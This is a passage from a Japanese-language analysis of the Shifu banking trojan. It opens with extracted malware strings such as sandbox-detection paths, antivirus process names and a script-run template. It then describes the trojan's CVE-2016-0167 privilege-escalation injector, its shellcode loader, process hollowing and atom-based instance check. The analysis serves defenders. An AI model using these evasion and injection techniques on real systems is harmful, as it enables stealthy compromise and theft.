SoftwareSoftware\\\\Sophos.bat\\\\\\\\.\\\\%C:\r\n|$$$}rstuvwxyz{$$$$$$$&gt;?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\\\\]^_`abcdefghijklmnopq\r\nconhost\r\nCreateProcessInternalW\r\nConvertStringSecurityDescriptorToSecurityDescriptorWContent-Type: multipart\/form-data; boundary=---------------------------%s\\r\\n\r\nContent-Type: application\/x-www-form-urlencoded\\r\\n\r\nHost: %s\\r\\n%d.%d.%d.%d\r\n%d.%d.%d.%d.%x\r\n%temp%\\\\debug_file.txt\r\n[%u][%s:%s:%u][0x%x;0x%x] %sDnsFlushResolverCache\r\n\\\\*.*\r\ndnsapi.dll\r\nDnsGetCacheDataTable.dll.exedownload.windowsupdate.com\r\nvk.com\r\nyandex.ru\r\nHTTP\/1.1https:\/\/http:\/\/%s\r\nIsWow64Process\r\nkernel\r\nkernel32.dllLdrGetProcedureAddress\r\nMicrosoft\r\nNtAllocateVirtualMemory\r\nCLOSED\r\nLAST_ACKTIME_WAIT\r\nDELETE_TCB\r\nLISTEN\r\nSYN_SENTSYN_RCVDESTAB\r\nFIN_WAIT1\r\nFIN_WAIT2\r\nCLOSE_WAIT\r\nCLOSING\r\nTCP\\t%s:%d\\t%s:%d\\t%s\\n\r\nnetstat\\nProto\\tLocal address\\tRemote address\\tState\\n\r\nntdll.dll\r\nNtResumeProcess\r\nNtSuspendProcess\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\drivers\\\\null.sys\r\nNtWriteVirtualMemoryopenRegisterApplicationRestart\r\nRtlCreateUserThread\r\nResetSR\r\nRtlComputeCrc32\r\nrundll32SeDebugPrivilegeSystemDrive\r\n\\\\StringFileInfo\\\\%04x%04x\\\\ProductName\r\nsoftware\\\\microsoft\\\\windows nt\\\\currentversion\\\\winlogon\r\nshell\r\nSleep\r\nsrclient.dllSeShutdownPrivilege\r\n\\\"%s\\\"\r\n%d\\t%s\\ntaskmgr\\nPID\\tProcess name\\nnet user\\n\r\nthe computer is joined to a 
domain\\n..\r\n\\\\VarFileInfo\\\\Translation\r\n%windir%\\\\system32\\\\%windir%\\\\syswow64\\\\POST*.exe\r\n%SystemDrive%\\\\\r\n*SYSTEM*%02x%s:Zone.Identifier\r\nGetProcessUserModeExceptionPolicy\r\nSetProcessUserModeExceptionPolicy\r\n%ws\\\\%ws\\n\r\nWORKGROUP\r\nHOMESoftware\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\ExplorerDisableCurrentUserRun\r\n%s.dat\r\nsoftware\\\\microsoft\\\\windows%OS%_%NUMBER_OF_PROCESSORS%\r\nS:(ML;;NRNWNX;;;LW)D:(A;;GA;;;WD)\r\nS:(ML;;NRNWNX;;;LW)D:(A;;GA;;;WD)(A;;GA;;;AC)\r\n\\\\\\\\.\\\\AVGIDSShim\r\nFFD3\\\\\\\\.\\\\NPF_NdisWanIpc:\\\\sample\\\\pos.exe\r\nANALYSERS\r\nSANDBOX\r\nVIRUS\r\nMALWARE\r\nFORTINETMALNETVMc:\\\\analysis\\\\sandboxstarter.exec:\\\\analysisc:\\\\insidetmc:\\\\windows\\\\system32\\\\drivers\\\\vmmouse.sys\r\nc:\\\\windows\\\\system32\\\\drivers\\\\vmhgfs.sys\r\nc:\\\\windows\\\\system32\\\\drivers\\\\vboxmouse.sys\r\nc:\\\\iDEFENSEc:\\\\popupkiller.exe\r\nc:\\\\tools\\\\execute.exe\r\nc:\\\\Perlc:\\\\Python27api_log.dll\r\ndir_watch.dll\r\npstorec.dll\r\ndbghelp.dll\r\nProcess32NextW\r\nSoftware\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\r\n1406.bitMiniDumpWriteDump\r\n\\r\\nReferer: %s\\r\\n\r\n\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cache\r\nvar %s = new ActiveXObject(\"WScript.Shell\"); %s.Run(\"%s\");\r\nIntelPowerAgent32\r\n%OS%_%NUMBER_OF_PROCESSORS%\r\n%s\\cmd.exe\r\nComSpec\r\nConsoleWindowClass\r\n.exekernel32.dllntdll.dll\r\nZwQuerySystemInformationZwAllocateVirtualMemory\r\nPsLookupProcessByProcessId\r\nPsReferencePrimaryToken\r\nClass\r\nWindow\r\nopen \"%s\" -q%windir%\\\\system32\\\\sdbinst.exe\r\n \/c \"start \"\" \"%s\" -d\"\r\n%windir%\\\\system32\\\\sndvol.exe\r\n \"%s\" -u \/c \"%s\\\\SysWOW64\\\\SysSndVol.exe \/c \"start \"\" \"%s\" 
-d\"\"\r\n%temp%\\\\%u\r\n%u.tmp\r\nWow64DisableWow64FsRedirection\r\nWow64RevertWow64FsRedirection\r\nrunas.exe\r\n%systemroot%\\\\system32\\\\svchost.exe\r\n%systemroot%\\\\system32\\\\wscript.exe\r\nsnxhk.dll\r\nsbiedll.dll\r\n \/c start \"\" \"%s\" \" \"\r\ncmd.exe\r\nrunas\r\n --crypt-test\r\nIt work's!\r\n --vm-test\r\n<\/pre>\n<h4>\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u3068\u57cb\u3081\u8fbc\u307fCVE-2016-0167\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8<\/h4>\n<p style=\"font-weight: 400;\">\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u3001\u611f\u67d3\u3055\u308c\u305f\u30db\u30b9\u30c8\u306eSYSTEM\u6a29\u9650\u3092\u53d6\u5f97\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u306f\u3001x86\u30b7\u30b9\u30c6\u30e0\u7528\u3068x64\u30b7\u30b9\u30c6\u30e0\u7528\u306e\u4e21\u65b9\u306e\u5b9f\u969b\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u542b\u307e\u308c\u307e\u3059\u3002\u30d5\u30a1\u30a4\u30eb\u5148\u982d\u306e\u30de\u30b8\u30c3\u30afPE\u30d0\u30a4\u30c8(\u201cMZ\u201d)\u306f\u3001\u305d\u308c\u3089\u304c\u81ea\u52d5\u62bd\u51fa\u3055\u308c\u308b\u306e\u3092\u963b\u6b62\u3059\u308b\u305f\u3081\u3001null\u30d0\u30a4\u30c8\u3067\u30d1\u30c3\u30c1\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u3001\u73fe\u5728\u306e\u30d7\u30ed\u30bb\u30b9\u306e\u6574\u5408\u6027\u30ec\u30d9\u30eb\u3068OS\u30d0\u30fc\u30b8\u30e7\u30f3\u3092\u78ba\u8a8d\u3057\u307e\u3059\u3002\u30d7\u30ed\u30bb\u30b9\u306e\u6574\u5408\u6027\u30ec\u30d9\u30eb\u304c\u4f4e\u304f\u3001OS\u30d0\u30fc\u30b8\u30e7\u30f3\u304c6.1 (Windows 7\/Windows Server 2008 R2)\u306e\u5834\u5408\u3001\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 
\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc \u30d5\u30a1\u30a4\u30eb\u3092\u30e1\u30e2\u30ea\u306b\u66f8\u304d\u8fbc\u307f\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001PE\u30aa\u30fc\u30d0\u30fc\u30ec\u30a4\u306e\u5148\u982d\u3092\u30de\u30fc\u30af\u3057\u3066\u3044\u308b\u30de\u30b8\u30c3\u30af\u50240x99999999\u3092\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u5185\u3067\u691c\u7d22\u3057\u307e\u3059\u3002\u30a2\u30c9\u30ec\u30b9\u304c\u898b\u3064\u304b\u308b\u3068\u300112\u30d0\u30a4\u30c8\u304c\u8ffd\u52a0\u3055\u308c\u3001\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u3001\u5b9f\u969b\u306b\u306f\u30ab\u30b9\u30bf\u30e0PE\u30ed\u30fc\u30c0\u30fc \u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u3067\u3042\u308b\u3001\u3053\u306e\u30a2\u30c9\u30ec\u30b9\u306b\u30b8\u30e3\u30f3\u30d7\u3057\u307e\u3059\u3002\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u306e\u547c\u3073\u51fa\u3057\u306f\u3001\u4ee5\u4e0b\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">00401EF5   pusha\r\n00401EF6   add esi, 0Ch\r\n00401EF9   call esi   -&gt; PE loader shellcode in overlay\r\n00401EFB   popa\r\n<\/pre>\n<h4>\u30ab\u30b9\u30bf\u30e0PE\u30ed\u30fc\u30c0\u30fc \u30b7\u30a7\u30eb\u30b3\u30fc\u30c9<\/h4>\n<p style=\"font-weight: 400;\">\u6700\u521d\u306b\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u306e\u7d42\u308f\u308a\u3092\u53d6\u5f97\u3057\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u5f8c\u304b\u3089\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc \u30d5\u30a1\u30a4\u30eb\u5185\u3067\u30de\u30b8\u30c3\u30afPE\u5024(\u201cMZ\u201d)\u3092\u30b9\u30ad\u30e3\u30f3\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u306e\u7d42\u308f\u308a\u3092\u53d6\u5f97\u3059\u308b\u30b3\u30fc\u30c9\u306f\u3001\u4ee5\u4e0b\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">00077174   jmp 
short 00077178\r\n00077176   pop eax\r\n00077177   retn\r\n00077178   call 00077176\r\n<\/pre>\n<p style=\"font-weight: 400;\">\u6b21\u306b\u3001\u30ab\u30b9\u30bf\u30e0GetProcAddress()\u95a2\u6570\u3092\u30cf\u30c3\u30b7\u30e5\u95a2\u6570\u3068\u4e00\u7dd2\u306b\u4f7f\u7528\u3057\u3066\u3001VirtualAllocEx()\u306e\u30a2\u30c9\u30ec\u30b9\u3092\u691c\u7d22\u3057\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001VirtualAllocEx()\u3092\u547c\u3073\u51fa\u3057\u3001\u9069\u5207\u306a\u30e1\u30e2\u30ea \u30a2\u30e9\u30a4\u30e1\u30f3\u30c8\u3067\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc \u30bb\u30af\u30b7\u30e7\u30f3\u3092\u66f8\u304d\u8fbc\u3080\u3053\u3068\u306e\u3067\u304d\u308b\u30d5\u30eb \u30a2\u30af\u30bb\u30b9\u6a29\u306e\u3042\u308b\u30e1\u30e2\u30ea \u30d0\u30c3\u30d5\u30a1\u3092\u5272\u308a\u5f53\u3066\u307e\u3059\u3002\u5fc5\u8981\u306a\u30e1\u30e2\u30ea \u30a2\u30c9\u30ec\u30b9\u306f\u518d\u914d\u7f6e\u60c5\u5831\u3092\u7528\u3044\u3066\u8abf\u6574\u3055\u308c\u3001API\u95a2\u6570\u30a2\u30c9\u30ec\u30b9\u304c\u89e3\u6c7a\u3055\u308c\u3001IAT\u304c\u57cb\u3081\u3089\u308c\u307e\u3059\u3002\u6700\u5f8c\u306b\u3001\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u304c\u65b0\u305f\u306b\u4f5c\u6210\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc \u30e2\u30b8\u30e5\u30fc\u30eb\u306eDLL\u5165\u53e3\u70b9\u306b\u30b8\u30e3\u30f3\u30d7\u3057\u307e\u3059\u3002<\/p>\n<h4>\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc<\/h4>\n<p style=\"font-weight: 400;\">\u6700\u521d\u306b\u3001\u6587\u5b57\u5217\u201ckernel32.dll\u201d\u3001\u201cLoadLibrary\u201d\u3001\u304a\u3088\u3073\u201cGetProcAddress\u201d\u304c\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002\u6b21\u306b\u3001kernel32.dll\u306e\u30a4\u30e1\u30fc\u30b8 \u30d9\u30fc\u30b9 
\u30a2\u30c9\u30ec\u30b9\u304c\u691c\u7d22\u3055\u308c\u3001LoadLibrary()\u304a\u3088\u3073GetProcAddress()\u306e\u4e21\u30a2\u30c9\u30ec\u30b9\u304c\u53d6\u5f97\u3055\u308c\u307e\u3059\u3002\u3053\u308c\u3089\u306eAPI\u95a2\u6570\u3092\u5229\u7528\u3059\u308b\u3053\u3068\u3067\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306eIAT\u30a2\u30c9\u30ec\u30b9\u304c\u89e3\u6c7a\u3055\u308c\u3001IAT\u304c\u57cb\u3081\u8fbc\u307e\u308c\u307e\u3059\u3002\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u3088\u3063\u3066\u51e6\u7406\u306f\u3059\u3067\u306b\u5b9f\u884c\u3055\u308c\u3066\u3044\u308b\u305f\u3081\u3001\u3053\u306e\u95a2\u6570\u306e\u76ee\u7684\u306f\u4e0d\u660e\u3067\u3059\u3002\u305d\u306e\u5f8c\u3001API\u95a2\u6570CreateThread()\u306b\u3088\u3063\u3066\u3001\u65b0\u3057\u3044\u30b9\u30ec\u30c3\u30c9\u304c\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u3053\u306e\u30b9\u30ec\u30c3\u30c9\u306f\u307e\u305aIsWow64Process()\u3092\u547c\u3073\u51fa\u3057\u3001\u305d\u306e\u7d50\u679c\u306b\u5fdc\u3058\u3066\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30d5\u30a1\u30a4\u30eb\u306e\u57cb\u3081\u8fbc\u307fx86\u30d0\u30fc\u30b8\u30e7\u30f3\u307e\u305f\u306fx64\u30d0\u30fc\u30b8\u30e7\u30f3\u306e\u3044\u305a\u308c\u304b\u304c\u30e1\u30e2\u30ea \u30d0\u30c3\u30d5\u30a1\u306b\u66f8\u304d\u8fbc\u307e\u308c\u307e\u3059\u3002\u6b21\u306b\u3001PE\u30de\u30b8\u30c3\u30af\u5024(\u201cMZ\u201d)\u304c\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 
\u30d5\u30a1\u30a4\u30eb\u306e\u5148\u982d\u306b\u66f8\u304d\u8fbc\u307e\u308c\u307e\u3059\u3002\u7d9a\u3044\u3066\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u5f8c\u3067\u4f7f\u7528\u3059\u308b\u3001\u201cWaitEventX\u201d\u3068\u3044\u3046\u30a4\u30d9\u30f3\u30c8\u304c\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u30e1\u30a4\u30f3\u95a2\u6570\u304c\u547c\u3073\u51fa\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u95a2\u6570\u3067\u306f\u3001\u6b21\u306e\u30d7\u30ed\u30bb\u30b9\u540d\u304c\u691c\u7d22\u3055\u308c\u3001\u898b\u3064\u304b\u3063\u305f\u5834\u5408\u306f\u3001Trend Micro\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3 \u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u306e\u4e00\u90e8\u3067\u3042\u308b\u6b21\u306e\u6587\u5b57\u5217\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u540d\u3082\u691c\u7d22\u3055\u308c\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">\u201cuiSeAgnt.exe\u201d<\/li>\n<li style=\"font-weight: 400;\">\u201cPtSessionAgent.exe\u201d<\/li>\n<li style=\"font-weight: 400;\">\u201cPwmSvc.exe\u201d<\/li>\n<li style=\"font-weight: 400;\">\u201ccoreServiceShell.exe\u201d<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u3053\u308c\u3089\u306e\u30d7\u30ed\u30bb\u30b9\u306e\u3044\u305a\u308c\u304b\u304c\u898b\u3064\u304b\u3063\u305f\u5834\u5408\u3001\u4e2d\u65ad\u72b6\u614b\u306e\u30d7\u30ed\u30bb\u30b9wuauclt.exe\u304c\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002\u305d\u3046\u3067\u306a\u3044\u5834\u5408\u306f\u3001\u4e2d\u65ad\u72b6\u614b\u306e\u30d7\u30ed\u30bb\u30b9svchost.exe\u304c\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002\u3044\u305a\u308c\u306e\u5834\u5408\u306b\u3082\u3001\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3\u5f15\u6570\u201c-k 
netsvcs\u201d\u304c\u6e21\u3055\u308c\u307e\u3059\u304c\u3001\u3053\u308c\u306fsvchost.exe\u3067\u306e\u307f\u4f7f\u7528\u3067\u304d\u307e\u3059\u3002Trend Micro\u30a4\u30f3\u30bf\u30fc\u30cd\u30c3\u30c8 \u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306ex64\u30d0\u30fc\u30b8\u30e7\u30f3\u304c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u3066\u3044\u308b\u5834\u5408\u3001\u3053\u306e\u6a5f\u80fd\u306f\u5fc5\u305a\u5931\u6557\u3057\u307e\u3059\u3002\u3053\u306e\u30b3\u30fc\u30c9(x86)\u306fx64\u30d7\u30ed\u30bb\u30b9\u306eCreateToolhelp32Snapshot()\u3092\u547c\u3073\u51fa\u3059\u305f\u3081\u3001\u30a8\u30e9\u30fc(ERROR_PARTIAL_COPY)\u304c\u767a\u751f\u3057\u307e\u3059\u3002\u3055\u3089\u306b\u3001\u30b3\u30fc\u30c9\u306f\u3001\u4fdd\u8b77\u3055\u308c\u305fTrend Micro\u30d7\u30ed\u30bb\u30b9\u3078\u306e\u30a2\u30af\u30bb\u30b9\u3092\u8a66\u307f\u308b\u305f\u3081\u3001\u5931\u6557\u3057\u307e\u3059(ERROR_ACCESS_DENIED)\u3002<\/p>\n<p style=\"font-weight: 400;\">\u6b21\u306b\u3001CreateFileMapping()\u304a\u3088\u3073MapViewOfFile()\u3092\u4f7f\u7528\u3057\u3066\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306ex86\u30d5\u30a1\u30a4\u30eb\u307e\u305f\u306fx64\u30d5\u30a1\u30a4\u30eb\u304c\u30e1\u30e2\u30ea\u306b\u30de\u30c3\u30d4\u30f3\u30b0\u3055\u308c\u3001\u305d\u306e\u30e1\u30e2\u30ea\u304c\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u30d0\u30a4\u30c8\u3067\u57cb\u3081\u8fbc\u307e\u308c\u307e\u3059\u3002\u6700\u5f8c\u306b\u3001ZwMapViewOfSection()\u3092\u4f7f\u7528\u3057\u3066\u3001\u305d\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u304c\u3001\u4e2d\u65ad\u72b6\u614b\u306e\u30d7\u30ed\u30bb\u30b9svchost.exe\u307e\u305f\u306fwuauclt.exe\u306b\u30de\u30c3\u30d4\u30f3\u30b0\u3055\u308c\u307e\u3059\u3002OS\u30d0\u30fc\u30b8\u30e7\u30f3\u304c5.2 (Windows Server 2003 \/ Windows XP 64\u30d3\u30c3\u30c8 
\u30a8\u30c7\u30a3\u30b7\u30e7\u30f3)\u3067\u3042\u308b\u304b\u3069\u3046\u304b\u304c\u78ba\u8a8d\u3055\u308c\u3001\u305d\u3046\u3067\u3042\u308b\u5834\u5408\u306f\u95a2\u6570\u304c\u7d42\u4e86\u3057\u307e\u3059\u3002\u305d\u306e\u5f8c\u30012\u3064\u306e\u30e1\u30e2\u30ea \u30d0\u30c3\u30d5\u30a1\u304c\u4f5c\u6210\u3055\u308c\u3001\u305d\u308c\u305e\u308c\u306b\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u304c\u66f8\u304d\u8fbc\u307e\u308c\u307e\u3059\u3002\u6700\u521d\u306e\u96e3\u8aad\u5316\u3055\u308c\u305f\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u306f\u3001\u30de\u30c3\u30d4\u30f3\u30b0\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30d5\u30a1\u30a4\u30eb\u306e\u30b9\u30c6\u30fc\u30b8\u30e3\u30fc\u3067\u3042\u308b2\u756a\u76ee\u306e\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u3092\u547c\u3073\u51fa\u3057\u307e\u3059\u3002\u6b21\u306b\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u5b9f\u884c\u3059\u308b\u305f\u3081\u3001ResumeThread()\u3092\u547c\u3073\u51fa\u3057\u3066\u3001\u4e2d\u65ad\u72b6\u614b\u306e\u30d7\u30ed\u30bb\u30b9\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u6210\u529f\u3057\u305f\u304b\u3069\u3046\u304b\u3092\u78ba\u8a8d\u3059\u308b\u305f\u3081\u306b\u3001\u305d\u306e\u6574\u5408\u6027\u30ec\u30d9\u30eb\u304cSECURITY_MANDATORY_LOW_RID\u306e\u307e\u307e\u3067\u3042\u308b\u304b\u3069\u3046\u304b\u3092\u30c1\u30a7\u30c3\u30af\u3057\u307e\u3059\u3002\u305d\u3046\u3067\u306a\u3044\u5834\u5408\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u6a29\u9650\u3092SECURITY_MANDATORY_SYSTEM_RID\u306b\u6607\u683c\u3055\u305b\u305f\u3053\u3068\u306b\u306a\u308a\u3001\u30e1\u30a4\u30f3 
\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u304c\u7d99\u7d9a\u3055\u308c\u307e\u3059\u3002\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u5931\u6557\u3057\u305f\u5834\u5408\u3001SYSTEM\u30e6\u30fc\u30b6\u30fc \u30a2\u30ab\u30a6\u30f3\u30c8\u3067\u306eWindows\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3(cmd.exe)\u304a\u3088\u3073runas.exe\u30c4\u30fc\u30eb\u3092\u4f7f\u7528\u3057\u305f\u81ea\u8eab\u306e\u5b9f\u884c\u304c\u8a66\u307f\u3089\u308c\u307e\u3059\u3002<\/p>\n<h4>Atom\u6587\u5b57\u5217\u306e\u69cb\u7bc9<\/h4>\n<p style=\"font-weight: 400;\">\u4eca\u65e5\u306e\u307b\u3068\u3093\u3069\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u3088\u3046\u306b\u30df\u30e5\u30fc\u30c6\u30c3\u30af\u30b9\u3092\u4f7f\u7528\u3059\u308b\u304b\u308f\u308a\u306b\u3001\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306fatom\u3092\u4f5c\u6210\u3057\u3001Shifu\u306e\u30a4\u30f3\u30b9\u30bf\u30f3\u30b9\u304c\u3059\u3067\u306b\u5b9f\u884c\u3055\u308c\u3066\u3044\u308b\u304b\u3069\u3046\u304b\u3092\u78ba\u8a8d\u3059\u308b\u305f\u3081\u306b\u30b0\u30ed\u30fc\u30d0\u30eb\u306eatom\u8868\u3092\u30c1\u30a7\u30c3\u30af\u3057\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u307e\u305a\u3001API ExpandEnvironmentStrings()\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u6587\u5b57\u5217\u201c%OS%_%NUMBER_OF_PROCESSORS%\u201d\u3092\u4f7f\u7528\u3057\u3066\u3001Windows\u30d0\u30fc\u30b8\u30e7\u30f3\u3068\u30d7\u30ed\u30bb\u30c3\u30b5\u6570\u3092\u53d6\u5f97\u3057\u307e\u3059\u3002\u305f\u3068\u3048\u3070\u30011\u3064\u306e\u30d7\u30ed\u30bb\u30c3\u30b5\u3067\u7a3c\u50cd\u3059\u308bWindows 
7\u306e\u5834\u5408\u3001\u7d50\u679c\u306f\u201cWindows_NT_1\u201d\u306b\u306a\u308a\u307e\u3059\u3002\u3053\u306e\u6587\u5b57\u5217\u306f\u3001\u6b21\u306e\u521d\u671f\u5024\u3092\u6301\u3064RtlComputeCrc32()\u3067\u30014\u3064\u306eCRC32\u30cf\u30c3\u30b7\u30e5\u3092\u8a08\u7b97\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">0xFFFFFFFF<\/li>\n<li style=\"font-weight: 400;\">0xEEEEEEEE<\/li>\n<li style=\"font-weight: 400;\">0xAAAAAAAA<\/li>\n<li style=\"font-weight: 400;\">0x77777777<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u6587\u5b57\u5217\u201cWindows_NT_1\u201d\u3067\u751f\u6210\u3055\u308c\u308bCRC\u30cf\u30c3\u30b7\u30e5\u306f\u6b21\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">0x395693AE<\/li>\n<li style=\"font-weight: 400;\">0xB24495D2<\/li>\n<li style=\"font-weight: 400;\">0xF39F86E1<\/li>\n<li style=\"font-weight: 400;\">0xBAE0B5C8<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u6b21\u306b\u3001\u5404CRC\u30cf\u30c3\u30b7\u30e5\u306e\u6700\u5f8c\u306e\u30d0\u30a4\u30c8\u304c\u3001\u30b9\u30bf\u30c3\u30af\u4e0a\u306eDWORD\u5024\u3068\u3057\u3066\u683c\u7d0d\u3055\u308c\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">0xAE000000 (0x395693AE\u306e\u4e00\u90e8)<\/li>\n<li style=\"font-weight: 400;\">0xD2000000 (0xB24495D2\u306e\u4e00\u90e8)<\/li>\n<li style=\"font-weight: 400;\">0xE1000000 (0xF39F86E1\u306e\u4e00\u90e8)<\/li>\n<li style=\"font-weight: 400;\">0xC8000000 (0xBAE0B5C8\u306e\u4e00\u90e8)<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u30cf\u30c3\u30b7\u30e5 \u30d0\u30a4\u30c8 \u30b7\u30fc\u30b1\u30f3\u30b9\u3092\u542b\u3080\u30b9\u30bf\u30c3\u30af\u306f\u3001\u6b21\u306e\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">AE 00 00 00 D2 00 00 00 E1 00 00 00 C8 00 00 00<\/p>\n<p style=\"font-weight: 
400;\">snprintf()\u95a2\u6570\u3092\u4f7f\u7528\u3057\u3066\u3001\u30cf\u30c3\u30b7\u30e5 \u30d0\u30a4\u30c8 \u30b7\u30fc\u30b1\u30f3\u30b9\u306e\u6700\u521d\u306e8\u30d0\u30a4\u30c8\u3092ASCII\u6587\u5b57\u306b\u5909\u63db\u3059\u308b\u3053\u3068\u3067\u3001atom\u6587\u5b57\u5217\u304c\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u5834\u5408\u306e\u7d50\u679c\u306f\u3001\u6b21\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">\u201cae000000d2000000\u201d<\/p>\n<p style=\"font-weight: 400;\">\u6700\u5f8c\u306b\u3001atom\u304c\u5b58\u5728\u3059\u308b\u304b\u3069\u3046\u304b\u3092\u78ba\u8a8d\u3059\u308b\u305f\u3081\u306bGlobalFindAtom() API\u304c\u547c\u3073\u51fa\u3055\u308c\u3001\u5b58\u5728\u3057\u306a\u3044\u5834\u5408\u306f\u3001GlobalAddAtom()\u304c\u547c\u3073\u51fa\u3055\u308c\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_23099\" aria-describedby=\"caption-attachment-23099\" style=\"width: 742px\" 